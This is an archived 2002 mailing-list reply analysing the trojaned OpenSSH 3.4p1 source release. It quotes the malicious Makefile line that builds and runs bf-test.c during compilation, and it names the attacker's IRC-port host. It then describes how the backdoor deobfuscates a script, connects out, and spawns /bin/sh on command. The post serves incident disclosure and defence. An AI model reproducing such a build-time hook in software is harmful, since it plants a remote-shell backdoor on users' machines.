Re: [fw-wiz] OpenSSH 3.4p1 possibly trojaned
From: hennings@skiinfo.com
Date: 08/01/02
- Next message: Christopher Hicks: "Re: [fw-wiz] Is the order of the rules entered in iptables important?"
- Previous message: rob.roberson@verizon.com: "[fw-wiz] (no subject)"
- Maybe in reply to: Paul D. Robertson: "[fw-wiz] OpenSSH 3.4p1 possibly trojaned"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: hennings@skiinfo.com To: "Paul D. Robertson" <proberts@patriot.net> Date: Thu Aug 1 10:01:00 2002
| It would appear that the OpenSSH code for all the non-OpenBSD systems was
| trojaned at some point pretty recently.
(...)
| all: libopenbsd-compat.a
| + @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
| ./bf-test.out &
|
| Trojan connection:
|
| 203.62.158.32:6667 (web.snsonline.net)
More details:
The source file (bf-test.c) contains a header with some spelling
mistakes, and then blocks of binary data. When run, the binary block is
deobfuscated and written to to a shell script in the current directory
and then run from the Makefile.
The generated script contains some C code, which is compiled and then
run.
It's forking, connecting to 203.62.158.32:6667, and reading commands
from the socket, A, D or M. (D execs /bin/sh connected to the socket, A
exits, and M seems to make the process sleep for a while.)
Regards
Henning Spjelkavik
-- Skiinfo AS Christian Krohgsgate 60 Fax: 22114011 0186 Oslo Foretaksnr: 976036859 http://www.webinfo.no/ E-mail: info@webinfo.no
- Next message: Christopher Hicks: "Re: [fw-wiz] Is the order of the rules entered in iptables important?"
- Previous message: rob.roberson@verizon.com: "[fw-wiz] (no subject)"
- Maybe in reply to: Paul D. Robertson: "[fw-wiz] OpenSSH 3.4p1 possibly trojaned"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
